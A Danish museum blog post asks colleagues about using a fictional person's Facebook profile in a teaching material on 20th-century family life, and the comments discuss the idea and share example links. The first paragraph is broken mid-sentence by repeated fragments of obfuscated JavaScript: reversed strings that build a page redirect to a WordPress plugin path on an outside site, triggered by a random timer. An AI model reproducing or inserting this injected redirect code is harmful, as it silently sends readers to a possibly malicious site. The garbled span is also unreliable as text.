På Viborg Stiftsmuseum er vi ved at formulere en del tanker til et undervisningsmateriale, vi kalder Familiekrøniken. En af de ting vi overvejer meget lige nu er brugen af sociale medier i tilknytning til materialet. Er der nogen af jer som har prøvet at oprette en profil på en fiktiv person på Facebook, en person som sætter sin egen histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torie på dagsordenen via stausopdateringer og links? Familiekrøniken følger 4 børn i 4 forskellige dele af det 20. århunderede. Det skulle være den yngste – den nulevende person – af de fire, som løbende perspektiverer elementer i sin egen hverdag til elementer i sin mors, sin bedstemors eller sin oldemors hverdag. Det som bekymrer mig er, om mediet overhovedet er egnet til den slags? Kriteriet om at det skal være et medie, som taler de ældste elevers sprog opfyldes, det er klart, men måske er mulighederne og grundlaget på Facebook for tyndt, ligesom jeg overvejer om ting alt for hurtigt mister deres aktualitet på Facebook? Derudover er der vedligeholdelsen. Det kan jo hænde at blive over mange år, man (jeg) skal holde den kørende. Der er materiale nok, men jeg har svært ved at få et indtryk af, hvor meget arbejde der vil være med det, hvis det skal fungere rigtig godt. Har I nogle erfaringer eller kender I til ekspempler på sådan en fiktiv profil?
4 comments to “Erfaringer med historiske profiler på Facebook.”
Skriv et svar
Du skal være logget ind for at skrive en kommentar.
Hej Rikke
Det lyder spændende med sociale medier som del af undervisningen. Det ser ud som om twitter bliver brugt mere til historiske personer. Men den her person er ikke historisk, blot fiktiv? Der gør det jo anderledes, at det er en ‘nulevende’ person fordi man så nok skal være ret tydelig om at vedkommende er fiktiv.
Det er min overbevisning, at man ikke rammer eleverne bedre ved at bruge et medie de bruger i deres hverdag, når det alligevel er i forbindelse med et undervisningsforløb (hvor de jo så bliver ført ind på siden). Jeg skriver speciale om kulturhistoriske museer på facebook og en af de ting der står mest klart i min undersøgelse er, at museerne ikke har specielt unge fans på facebook. Jeg vil nok nærmere betegne museernes fans som kernebrugere (dem der i høj grad også bruger museets hjemmeside, nyhedsbrev, fysiske museum mv). På den måde tænker jeg, at man skal se store alarmklokker ringe når man tænker at noget er et medie ‘for unge’. Det handler om indholdet, ikke mediet.
Jeg tænker også det kan være eleverne ikke vil være ven med den her person (og det bliver de jo nødt til, hvis de skal interagere med vedkommende på fx facebook) – og de bliver nødt til at have en profil på facebook for at kunne komme derind.
Det kunne man løse ved at bruge twitter. Men det er udenfor mit undersøgelsesområde, så der er jeg ikke ekspert.
Jeg mener egentlig ikke at grundlaget er for tyndt på facebook – det kommer an på hvad man lægger i det. Men som du selv skriver er der problemet med at prioritere mediet. Og det lyder som om det er unikt indhold, der skal komme fra den fiktive person (hvor de fleste museer genbruger indhold til facebook, hjemmeside, twitter, flickr mv.) På den anden side, hvis det er en del af et undervisningsforløb kan tiden i den forbindelse også bruges til opdateringer.
Alt i alt kommer det an på hvad I har af forventninger til mediet. Skal der være dialog med eleverne? Eller skal det være et andet sted at finde informationer om den fiktive person? Skal de få en større tilknytning til museet? Skal de blive fans efterfølgende? Skal de besøge museet?
Glæder mig til at høre mere om projektet. Synes det er FANTASTISK at nogen vover sig ud i museumsundervisning på sociale medier. Thumbs up!
Hej Linea
Hvor er jeg glad for, at du har læst mit indlæg og vil bruge tid på at svare!! Tak for det! Og yderst interessant specialeemne! Glæder mig til at læse det! Men det er rigtigt, ja, det er en fiktiv og ikke en historisk person….beklager at jeg fik gjort det uklart før. Jeg synes i sær det er interessant, at du skriver at Facebook (FB) måske nok er et medie de unge bruger, men at det ikke nødvendigvis er noget, som gør museumsverdenen mere vedkommende eller interessant for dem. Det er en vigtig pointe. Familiekrøniken bliver et digitalt undervisningsmateriale, som kan bruges alene eller sammen med vores udstilling “Familien i det 20. århundrede”. Jeg havde tænkt, at FB var et tredje sted som kunne suppelere deres viden og (forhåbentlig :-)) nysgerrighed omkring emnet. Men det er rigtigt, at det er nok for sårbart, eller hvad man nu skal kalde det, at de SKAL være venner med den fiktive person for at kunne deltage i den del af forløbet. Det hele handler måske også om dine sidste pointer, nemlig dem om mine forventinger til mediet. Jeg er vist ikke helt afklaret der. Måske er min forventing, at FB på en eller anden måde kunne supplere et uformelt læringsmiljø og at det kunne sætte museets dagsorden (den historiske formidling) i øjnhøjde med de unge selv. Men spørgsmålet er om de overhovedet vil byde den slags “pædagogiske tiltag” velkommen i deres FB verden. Noget i det du skriver tyder på, at man ikke skal føle sig for sikker :-). Men jeg glæder mig til at jeg kan vise dig og andre det færdige resultat. Det er sjovt at lave….og bliver forhåbentligt sjovt at bruge.
Hej Rikke (og Linnea)
Spændende at I har disse tanker i Viborg! Der er klart mange udfordringer i det (bl.a. Facebooks TOS, som måske er mere oplagt til en side for et projekt end en personprofil) På NM er et projekt under opsejling – med tilkytning til 1700-tallet – så her er nogle af disse ting pt. under overvejelse. Hvis du/I har lyst, så skriv eller ring til os – det kan blive lidt langt her 🙂 (Det er ikke mig, men én af vores aktivitetsfolk, der er projektansvarlig for det.)
Det er ikke formel undervisning men i højere grad et “aktivitetsprojekt” … en slags “faktionsleg”, hvor der også er planer om aktiviteter on-site. Noget af det, der har været diskuteret rigtigt meget er at få en naturlig start OG – ikke mindst – en slutning på projektet. En vanskelig ting er jo netop forholdet mellem de sociale mediers processuelle karakter og det meget kortsigtede perspektiv, der ligger i projektformen. Men præmisserne vil selvfølgelig blive gjort klart for alle fra start.
Efter min mening er FB og lignende lifestream-mediers flow meget velegnede til netop at arbejde med (og anskueliggøre) historiske processer og interaktion mellem forskellige personer. Egentlig undervisning tror jeg også kan være en udfordring: Er man interesseret i at bruge de medier som anvendes i fritid etc. i en formel læringssammenhæng? Hvad synes lærerne om det?
Og så er der det område, som Linnea er inde på – spørgsmålet om medie og målgruppe. Vi får se, om det projekt der arbejdes på her, får en anden aldersprofil end den, der er på den “almindelige” facebook-side. Men jeg er meget enig med Linnea i, at det så snarere vil være indholdets end mediets skyld. Jeg tror heller ikke på, at man kan “lokke ungdommen til” ved fx blot at putte det sædvanlige indhold på mobiltelefon eller sociale netværkssider 🙂
Der er flere eksempler på historiske profiler, sider og grupper på Facebook, fx flere styks Christian den Fjerde´r og Egtvedpiger, Christian den Anden, Grauballemanden, Pekingmennesket, Bocksteenmanden og Kvinnan från Bäckaskog. Men så vidt jeg ved er ingen af dem styret af institutioner og/eller anvendt på måder som ligger i forlængelse af det du skriver. Jeg mener også, at Grauballemanden (i hvertfald en overgang) var navnet på en profil på MySpace. I den mere alvorlige ende er fx Henio Zytomirski´s profil ( artikel i WT: http://washingtontimes.com/news/2010/feb/11/to-henio-in-memory/?page=3 som jeg blev gjort opmærksom på for ganske nyligt)
Jeg har skrevet lidt om dette her med “simuleret realtid” tidligere her på bloggen (og i privaten) så nu lægger jeg bare lige nogle links til steder, som måske kunne være interessante, selvom det ikke lige er facebook.
Twitenactment:
http://twitter.com/CubanMissile09
http://twhistory.com/gettysburg
http://twitter.com/IamHenryviii (Henrik 8´s kroning)
http://twitter.com/JFK__1960 JFK´s valgkamp 1960
(Jeg har lavet en liste på http://twitter.com/#/list/charlotteshj/twitenactment som rummer flere interessante steder og http://twitter.com/list/charlotteshj/historical-persons – ikke alle er lige autentiske, men kig fx på Genny Spencer og Samuel Pepys) Kig evt. også forbi TwHistorys prezi på http://prezi.com/u844gbe1oi34/twhistory-historical-reenactments-with-twitter/ )
Blogs
Harry Lamins blog fra WWI http://wwar1.blogspot.com kunne også fremhæves som et eksempel autentisk formidling via “nye” medier (Harry er også at finde på facebook, men som projekt, men skriver i første person) Andre “krigsblogs” er Dieter Finzen http://dieter-finzen.blogspot.com og siten http://www.war-diary.com, hvor du kan finde flere eksempler på “personlig-historisk” formidling via blogs i simuleret realtid.
Håber noget af det kan inspirere videre!
Kære Charlotte
Om det kan inspirere!!! Du er en haj. Tak for dine tanker og for diverse links. Jeg har ikke været inde på nogen af dem endnu, men jeg vil glæde mig til det over de næste par dage (velsignet af den ro vinterferien bringer). Hvad angår lærernes holdning til alt det her hejs :-), så har jeg kontakt til en, en historie- og dansklærer af den gode støbning :-), som følger projektets udvikling. Han har ferie i denne uge, så jeg har ikke fået ham ind i denne konkrete debat endnu, men jeg trækker i ham i næste uge. Jeg kunne rigtig godt tænke mig lidt mere snak med den ansvarlige for NM’s projekt. Kan du sende mig en email adresse på rij@viborg.dk?